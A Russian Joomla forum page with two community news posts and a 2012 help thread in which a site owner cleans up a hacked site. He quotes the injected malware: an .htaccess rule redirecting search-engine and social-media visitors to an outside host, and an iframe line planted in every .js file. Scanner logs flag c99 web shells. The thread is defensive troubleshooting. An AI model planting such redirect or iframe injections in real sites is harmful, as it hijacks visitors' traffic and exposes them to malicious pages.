Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 17 Ответов
  • 6048 Просмотров
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
Например, в .htaccess вот это появилось

Цитировать
^.*(duckduckgo|ask|google|dogpile|archive|clusty|mahalo|mywebsearch|blekko|lycos|webcrawler|info|infospace|search|excite|goodsearch|altavista|live|msn|aol|yahoo|youtube|wikipedia|infoseek|bing|facebook|twitter|myspace|linkedin|flickr|deviantart|livejournal|tagged|badoo|mylife|ning|pinterest)\.(.*)                                                                                          
                                                                                          RewriteRule ^(.*)$ http://xmlbasedautomaticupdate.pingpong-shop.info/gjhk.cgi?7 [R=301,L]

Во всех .js файлах это

Цитировать
document.write('<iframe src="http://xmlbasedautomaticupdate.pingpong-shop.info/gjhk.cgi?7"
scrolling="auto" frameborder="no" align="center" height="15" width="15"></iframe>');

Ссылка ведет на Google, вирусы на сайте не обнаружены...
Что это за хрень такая?
*

smart

  • Администратор
  • 6478
  • 1318 / 15
  • Хочешь сделать хорошо — сделай!
Ничего нового - у вас троян увел пароль от FTP... Как с этим бороться - читайте данный раздел, информации полно.
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
smart, а в чем смысл этого всего? Просто замедлить работу сайта?
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Слить траффик. Сканерами из темы в подписи проверьте свой сайт, а комп AVPTool.
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
Слить траффик. Сканерами из темы в подписи проверьте свой сайт, а комп AVPTool.
Даа... совсем я не в теме... Всё вручную почистил, а можно было скриптом.

Сканеры:
ai-bolit.php выдает 502 Bad Gateway

fls.php выдает кучу строк вида:
File: /home/host1232457/*****/htdocs/www/templates/gk_corporate2/libs/gk.template.helper.php
String:: $_POST[

wishlight, что мне с этим делать?

AVPTool в процессе...
-----------
Ничего не нашел
« Последнее редактирование: 04.11.2012, 16:31:06 от 4ort »
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
есть что-то кроме get и post?
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
Да, еще есть такие:

Цитировать
File: /home/host1232457/***/htdocs/www/administrator/components/com_content/admin.content.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_jcomments/admin.jcomments.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/lib/class.upload.php
String:: phpinfo()

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/categories/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/comments/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/cpanel/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/item/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_k2/views/users/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_phocadownload/views/phocadownloadusers/view.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_phocadownload/views/phocadownloadut/view.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_redj/views/errors/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_redj/views/referers/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_sh404sef/admin.sh404sef.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_swmenupro/admin.swmenupro.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_trash/admin.trash.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_akeeba/views/buadmin/view.html.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/administrator/components/com_hwdvideoshare/helpers/js.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/cache/mod_k2_content/1c9290c57d08b4fac3d3089b17b2f3e6.php
String:: c99

File: /home/host1232457/***/htdocs/www/cache/com_k2_extended/8f71b304f2f7eb6039db0c5539cd3959.php
String:: c99

File: /home/host1232457/***/htdocs/www/components/com_jcomments/tpl/default/tpl_comment.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_jcomments/tpl/gk_style/tpl_comment.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_k2/views/comments/tmpl/default.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_k2/views/item/tmpl/form.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/components/com_hwdvideoshare/assets/uploads/perl/ubr_file_upload.php
String:: phpinfo()

File: /home/host1232457/***/htdocs/www/components/com_hwdvideoshare/views/upload_perl.php
String:: phpinfo()

File: /home/host1232457/***/htdocs/www/components/com_hwdvideoshare/controller.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/libraries/joomla/html/toolbar/button/confirm.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/media/mod_vinaora_cu3er/config/demo1.xml.php
String:: c99

File: /home/host1232457/***/htdocs/www/plugins/system/osolcaptcha.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/templates/gk_corporate2/layouts/blocks/iphone/mainnav.php
String:: confirm(

File: /home/host1232457/***/htdocs/www/ai-bolit.php
String:: phpinfo()
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Все файлы которые помечены как String:: c99 заражены - это шеллы удаляйте их.

Спойлер
[свернуть]
« Последнее редактирование: 04.11.2012, 18:44:07 от Apple_Buy »
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
Вот полный лог:
Спойлер
[свернуть]
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
Все файлы которые помечены как String:: c99 заражены - это шеллы удаляйте их.
Вообще странно - я сравнил например этот файл /www/media/mod_vinaora_cu3er/config/demo1.xml.php с файлом из резервной копии незараженного сайта (перед выгрузкой на хостинг) - они идентичны.
----
p.s. остальные из папки кэша удалил.
« Последнее редактирование: 04.11.2012, 19:32:40 от 4ort »
*

Apple_Buy

  • Захожу иногда
  • 71
  • 1 / 0
  • Истина всегда рядом....
Вообще странно - я сравнил например этот файл /www/media/mod_vinaora_cu3er/config/demo1.xml.php с файлом из резервной копии незараженного сайта (перед выгрузкой на хостинг) - они идентичны.
----
p.s. остальные из папки кэша удалил.

Я бы не был на вашем месте так уверен что другой сайт не заражен, может быть он ждет своего часа. Модуль брали из какого источника? Посмотрите может быть есть новая версия и стоит обновить до последней.
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
Брал из бэкапа этого-же сайта - он больше года работал без каких либо признаков заражения. Модуль брал с сайта разработчиков - думаю, еслиб проблема была в модуле, заражение появилось бы в течении года работы. Новых версий для J1.5 нет.
*

WebDisaster

  • Захожу иногда
  • 108
  • 12 / 0
Брал из бэкапа этого-же сайта - он больше года работал без каких либо признаков заражения.
Это ничего не гарантирует. У меня шелл (судя по дате создания файла) пролежал несколько месяцев до того, как им начали пользоваться. Если Вы сами закинули себе шелл вместе с модулем, и он без "обратного звонка" хозяину (либо "звонки" уходили в никуда), шелл может найти бот, который тупо тычется в разные адреса в поисках известных дыр.
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
Вот содержимое этого файла (он небольшой) - что тут может указывать на шелл?
Из вики: "Шелл-код почти всегда содержит строку с именем оболочки" - что-нибудь в файле на это указывает?

Спойлер
[свернуть]

Просто если сносить этот модуль, то хоть по делу, а не на всякий случай...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
обратите внимание на
Цитировать
File: /home/host1232457/***/htdocs/www/sxd/index.php
String:: $_POST['pass']
что там в файле?
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
что там в файле?
Sypex Dumper
Спойлер
[свернуть]
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
вы что скрип для дампа БД храните постоянно на хосте?
его как и все дополнительные скрипты заливают только для работы и потом сразу удаляют (к сканерам это тоже относиться)
*

4ort

  • Захожу иногда
  • 82
  • 0 / 0
вы что скрип для дампа БД храните постоянно на хосте?
Ээээ... Блин, да, хранил...
-------
Удалил всё...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться